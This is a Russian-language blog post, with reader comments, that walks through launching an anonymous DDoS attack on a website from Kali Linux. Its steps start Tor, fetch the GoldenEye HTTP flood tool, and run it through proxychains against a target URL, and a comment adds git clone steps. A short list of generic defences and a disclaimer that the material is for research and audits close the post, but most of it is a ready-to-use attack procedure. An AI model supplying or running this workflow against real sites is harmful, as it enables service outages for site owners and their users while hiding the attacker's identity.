DDOS сайта анонимно с помощью инструментов Kali Linux — Information Security Squad



DDOS сайта анонимно с помощью инструментов Kali Linux


Опубликовано : 19.12.2018


By

cryptoparty

Инструменты DDOS способны загружать большие нагрузки на HTTP-серверы и ставить их на колени, исчерпывая  ресурсы.

Что такое DDOS-атака?

Тип атаки, при которой несколько скомпрометированных систем атакуют одну цель, которая запрещает доступ к службе законных пользователей целевой системы.

В этом учебном пособии по Kali Linux мы обсудим выполнение DDOS-атаки с Kali Linux.

Необходимые инструменты

  1. EtherApe — графический сетевой монитор, который графически отображает сетевую активность. Хосты и ссылки изменяются по размеру с трафиком. Отображаются цветные протоколы.
  2. Tor-Tor позволяет клиентам и реле предлагать скрытые сервисы. То есть вы можете предложить веб-сервер, SSH-сервер и т. д., Не раскрывая свой IP-адрес своим пользователям.
  3. Proxychains — Последняя версия Proxychains поддерживает прокси-серверы SOCKS5, SOCKS4 и HTTP CONNECT. Proxychains можно смешивать с разными типами прокси.
  4. GoldenEye — приложение GoldenEye для python, предназначенное для тестирования безопасности.

Как выполнить атаку DDOS на сайт

Шаг 1: Запустите etherape :

root @ kali: ~ # etherape
 
он предложит всплывающее окно, которое графически отображает сетевую активность.
 
Шаг 2: Запуск службу TOR:
 
 root@kali:~# service tor start

Шаг 3: Загрузите Goldeneye https://github.com/jseidl/GoldenEye

Шаг4: После загрузки Разархивируйте его

root @ kali: ~ # unzip GoldenEye-master.zip

Шаг 5: Запустите атаку

 root@kali:~/GoldenEye-master# proxychains ./goldeneye.py http://testdomain.com

Если вы столкнулись с проблемами выполнения или другими проблемами совместимости, не стесняйтесь комментировать.

Общая защита от атаки DDOS

  • Снижение скорости подключения IP.
  • Используйте IDS,брандмауэры  веб-приложений.
  • Tweak Connection для IP-порога.
  • Использование хостингов, которые предлагают услугу «защита сайта от взлома«

¯_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

 

6 комментария на “DDOS сайта анонимно с помощью инструментов Kali Linux

  1. Шаг 3: Загрузите Goldeneye https://github.com/jseidl/GoldenEye

    root @ kali: ~ # git clone https://github.com/jseidl/GoldenEye.git

    Шаг4: После загрузки Разархивируйте его

    root @ kali: ~ # cd GoldenEye

  2. То есть, CF (Cloud Flare), как защиту от DOS, DDOS, вы решили не рассматривать даже?

    1. Всмысле? Это пример атаки, а не обзор WAF

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Комментарий

Имя *

E-mail *

Сайт

https://itsecforu.ru/2018/12/19/ddos-%D1%81%D0%B0%D0%B9%D1%82%D0%B0-%D0%B0%D0%BD%D0%BE%D0%BD%D0%B8%D0%BC%D0%BD%D0%BE-%D1%81-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C%D1%8E-%D0%B8%D0%BD%D1%81%D1%82%D1%80%D1%83%D0%BC%D0%B5%D0%BD%D1%82/

Губарь Маргарита Александровна